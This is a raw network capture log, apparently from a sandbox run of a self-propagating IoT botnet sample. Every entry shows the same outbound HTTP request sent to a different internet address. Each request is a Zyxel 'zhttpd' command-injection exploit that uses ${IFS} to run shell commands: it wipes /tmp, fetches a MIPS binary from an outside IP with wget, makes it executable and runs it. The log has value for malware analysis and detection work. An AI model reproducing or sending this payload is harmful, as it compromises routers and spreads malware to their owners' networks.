                                                      Feb 2, 2024 06:35:38.339567900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      892192.168.2.144465479.96.35.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339590073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      893192.168.2.1436744137.180.7.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339643955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      894192.168.2.1457504109.194.129.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339703083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      895192.168.2.1453462121.54.220.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339777946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      896192.168.2.1457608177.213.87.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339826107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      897192.168.2.1458130180.69.93.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339888096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      898192.168.2.1449040220.113.58.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339967966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      899192.168.2.143388843.96.28.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.339998007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      900192.168.2.1449880172.108.187.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340069056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      901192.168.2.1460222130.129.10.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340133905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      902192.168.2.1443352115.11.128.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340181112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      903192.168.2.143918846.64.149.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340251923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      904192.168.2.1444800223.247.125.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340312004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      905192.168.2.1432974149.181.46.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340394974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      906192.168.2.1442594219.95.184.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340420008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      907192.168.2.1454778111.127.12.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340491056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      908192.168.2.145325891.240.106.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340531111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      909192.168.2.1438814122.179.211.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340606928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      910192.168.2.1456566182.205.128.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340657949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      911192.168.2.143449814.119.183.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340708017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      912192.168.2.1434410180.223.76.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340764999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      913192.168.2.1444326141.242.64.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340833902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      914192.168.2.1440978123.38.150.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340868950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      915192.168.2.1436714121.247.209.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340948105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      916192.168.2.1446032184.32.206.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.340993881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      917192.168.2.1442756219.67.90.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.341061115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      918192.168.2.1451398100.49.151.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.341067076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      919192.168.2.145266223.201.127.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.341131926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      920192.168.2.144273292.248.11.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.326639891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      921192.168.2.145787461.217.7.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.326755047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      922192.168.2.1434726200.244.103.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.326822042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      923192.168.2.145530425.156.191.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.326864958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      924192.168.2.1437712175.141.77.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.326922894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      925192.168.2.1433958189.114.158.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.326956987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      926192.168.2.1443318130.83.34.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.326983929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      927192.168.2.1459150173.177.237.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327029943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      928192.168.2.1457580182.182.215.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327066898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      929192.168.2.1457672102.77.39.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327133894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      930192.168.2.144824646.180.220.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327156067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      931192.168.2.1450034178.104.204.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327224016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      932192.168.2.1451196178.105.120.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327229977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      933192.168.2.1440716200.155.26.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327294111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      934192.168.2.145264634.211.34.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327317953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      935192.168.2.1458342141.184.103.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327394962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      936192.168.2.1441540129.15.63.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327403069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      937192.168.2.145970059.12.119.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327450037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      938192.168.2.146067014.31.25.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327497005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      939192.168.2.1433068110.20.19.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327550888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      940192.168.2.144457467.67.30.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327570915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      941192.168.2.145130417.217.169.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327598095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      942192.168.2.1433624107.252.242.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327652931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      943192.168.2.1449240125.162.202.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327689886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      944192.168.2.1436522143.254.39.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327728987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      945192.168.2.145517284.50.123.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327792883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      946192.168.2.1446242101.79.144.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327812910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      947192.168.2.143926496.33.15.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327822924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      948192.168.2.1436624163.184.130.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327852011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      949192.168.2.144138645.94.124.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327912092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      950192.168.2.145295479.238.92.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.327963114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      951192.168.2.14424988.94.138.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328005075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      952192.168.2.143912073.178.180.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328039885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      953192.168.2.144907417.151.1.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328078032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      954192.168.2.14370108.0.137.59443
                                                      TimestampBytes transferredDirectionData
